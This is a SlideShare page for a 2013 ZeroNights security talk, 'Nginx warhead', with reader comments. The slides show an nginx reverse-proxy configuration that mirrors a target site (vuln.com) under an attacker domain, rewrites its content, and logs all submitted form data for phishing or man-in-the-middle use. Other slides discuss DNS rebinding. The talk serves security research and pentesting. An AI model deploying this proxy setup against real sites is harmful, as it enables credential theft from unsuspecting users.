Sergey Belov
•

Pentester in Digital Security / ERPScan;

•

Writer (habrahabr.ru, “Xakep”);

•

CTF Player;

•

Bug bounty member (Goo...
•

Very easy

•

0$

•

Not mentioned in the wild
NGinx – reverse proxy
php-fpm
Client

Nginx
Apache
attacker.com

Client

php-fpm

Nginx
Apache
vuln.com

??? http server
Step 1
location / {
proxy_pass
http://vuln.com;
proxy_set_header X-Real-IP $remote_addr;
}
}
Step 2





proxy_set_header Host “vuln.com";
sub_filter ‘vuln.com' ‘attacker.com';
sub_filter_once off;
Phishing
NGinx – tool for MitM/phishing?






+ Identical design
+ Fully functional working
+ Logging all data (POST/GET)
+ A...
Pentest
 Random exploit’s?
 Change response data (rights of social
networks apps)
 Change apps swf -> java (exploit)
 ...
DNS rebinding
• -Another domain
• - Very unstable
• + Can attack internal resources
Internal, not external!
C:UsersBeLove>ping www.ya.ru
Обмен пакетами с ya.ru [87.250.250.203] с 32 байтами данных
Remove it from:
• Pentester’s reports
• Most famous security scanners
Thanks!
demo:
http://zn.sergeybelove.ru
http://twitter.com/sergeybelove
Nginx warhead
Upcoming SlideShare
Loading in...5
×

Nginx warhead

653

Published on

ZeroNights 2013 talk about nginx

Published in: Technology
6 Comments
0 Likes
Statistics
Notes
  • P.S. о заголовках сервера-же речь. Твой MitM будет политься как растаман перед мавзолеем на красной площади.
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • sergeybelove тогда уж dnat, string и mangle
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • Говорилось не про угрозу, а про трюк: хватит подделок на пхп с рипнутым дизайном и позороным редиректом после ввода логина/пароля, когда можно полностью спроксировать ресурс, если юзер уже открыл нашу ссылку.
    И второй момент - хватит писать в отчетах сканеров / пентестеров про dns rebind на сайтах с внешним IP.

    P.S. О каких заголовках речь? Мы _полностью_ эмулируем легитимного юзера, совпадение идет всех заголовков. Как говорилось пример - zn.sergeybelove.ru
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • @alexanderlyamin я вот тоже не понял
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • headers will be altered == easily detectable == whats the point?
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • Be the first to like this

No Downloads
Views
Total Views
653
On Slideshare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
6
Comments
6
Likes
0
Embeds 0
No embeds

No notes for slide

Nginx warhead

  1. 1. Sergey Belov
  2. 2. • Pentester in Digital Security / ERPScan; • Writer (habrahabr.ru, “Xakep”); • CTF Player; • Bug bounty member (Google, Yandex); • bugscollector.com creator.
  3. 3. • Very easy • 0$ • Not mentioned in the wild
  4. 4. NGinx – reverse proxy
  5. 5. php-fpm Client Nginx Apache
  6. 6. attacker.com Client php-fpm Nginx Apache vuln.com ??? http server
  7. 7. Step 1 location / { proxy_pass http://vuln.com; proxy_set_header X-Real-IP $remote_addr; } }
  8. 8. Step 2    proxy_set_header Host “vuln.com"; sub_filter ‘vuln.com' ‘attacker.com'; sub_filter_once off;
  9. 9. Phishing
  10. 10. NGinx – tool for MitM/phishing?      + Identical design + Fully functional working + Logging all data (POST/GET) + Add custom JS/HTML - Another domain (DNS poising / router hacking, malware, evil apn config e.t.c.)
  11. 11. Pentest  Random exploit’s?  Change response data (rights of social networks apps)  Change apps swf -> java (exploit)  ???
  12. 12. DNS rebinding
  13. 13. • -Another domain • - Very unstable • + Can attack internal resources
  14. 14. Internal, not external!
  15. 15. C:UsersBeLove>ping www.ya.ru Обмен пакетами с ya.ru [87.250.250.203] с 32 байтами данных
  16. 16. Remove it from: • Pentester’s reports • Most famous security scanners
  17. 17. Thanks! demo: http://zn.sergeybelove.ru http://twitter.com/sergeybelove
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×